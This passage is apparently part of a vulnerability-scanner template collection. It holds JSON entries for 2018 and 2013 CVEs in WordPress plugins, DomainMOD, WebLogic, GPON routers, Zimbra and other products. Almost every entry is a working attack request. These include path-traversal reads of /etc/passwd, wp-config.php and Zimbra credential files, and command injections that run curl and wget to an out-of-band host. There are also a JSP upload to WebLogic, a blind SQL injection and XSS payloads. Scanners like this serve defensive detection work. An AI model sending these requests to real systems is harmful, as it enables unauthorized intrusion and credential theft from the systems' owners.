Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16159","info":{"name":"WordPress Gift Voucher <4.1.8 - Blind SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=wpgv_doajax_front_template&template_id=1 and sleep(6)#\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"images\") && contains(body, \"title\")"],"condition":"and"}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16283","info":{"name":"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-11784","info":{"name":"Apache Tomcat - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","negative":true,"status":[404]}]}]},{"id":"CVE-2018-16133","info":{"name":"Cybrotech CyBroHttpServer 1.0.3 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET \\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19915","info":{"name":"DomainMOD <=4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/host.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test\n","GET /assets/hosting.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-3760","info":{"name":"Ruby On Rails - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /assets/file:%2f%2f/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /assets/file:%2f%2f{{path}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"path","regex":["/etc/passwd is no longer under a load path: (.*?),"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-16761","info":{"name":"Eventum <3.4.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/select_project.php?url=http://interact.sh","{{BaseURL}}/clock_status.php?current_page=http://interact.sh"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-10201","info":{"name":"Ncomputing vSPace Pro 10 and 11 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini","{{BaseURL}}/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini","{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini","{{BaseURL}}/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-12613","info":{"name":"PhpMyAdmin <4.8.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5230","info":{"name":"Atlassian Jira Confluence - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iframe src=\"javascript:alert(document.domain)\">","confluence"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11709","info":{"name":"WordPress wpForo Forum <= 1.4.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/community/?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14912","info":{"name":"cgit < 1.2.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20010","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider-account.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes=\n","GET /assets/ssl-accounts.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ws_utc/resources/setting/options HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsetting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80\n","POST /ws_utc/resources/setting/keystore HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_name\"\n\n{{randstr}}\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_edit_mode\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_front\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password\"\n\n\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_password_changed\"\n\nfalse\n------WebKitFormBoundaryuim0dyiDSPBPu31g\nContent-Disposition: form-data; name=\"ks_filename\"; filename=\"{{randstr}}.jsp\"\nContent-Type: application/octet-stream\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n\n<%\nString cve = \"CVE-2018-2894\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  //0x03 is equal to 0x3, but we need 0x03 for our md5sum\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\n\nout.println(hashedpasswd.toString());\n%>\n------WebKitFormBoundaryuim0dyiDSPBPu31g--\n","GET /ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["26ec00a3a03f6bfc5226fd121567bb58"]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["<keyStoreItem><id>([0-9]+)</id><name>{{randstr}}"],"internal":true}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-15917","info":{"name":"Jorani Leave Management System 0.6.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1\nHost: {{Hostname}}\n","GET /session/login HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","_jorani"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15138","info":{"name":"LG-Ericsson iPECS NMS 30M - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data","{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000129","info":{"name":"Jolokia 1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html","{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg onload=alert(document.domain)>","java.lang.IllegalArgumentException","No type with name"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19753","info":{"name":"Tarantella Enterprise <3.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-19749","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/account-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_owner=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=\n","GET /assets/account-owners.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, '><script>alert(document.domain)</script></a>')"],"condition":"and"}]}]},{"id":"CVE-2018-12998","info":{"name":"Zoho manageengine - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10093","info":{"name":"AudioCode 420HD - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command.cgi?cat%20/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["admin:.*:*sh$"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19136","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>&really_del=1\">YES"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3714","info":{"name":"node-srv - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/node_modules/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20463","info":{"name":"WordPress JSmol2WP <=1.07 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'DB_USER',","'DB_PASSWORD'"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-12300","info":{"name":"Seagate NAS OS 4.3.15.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site 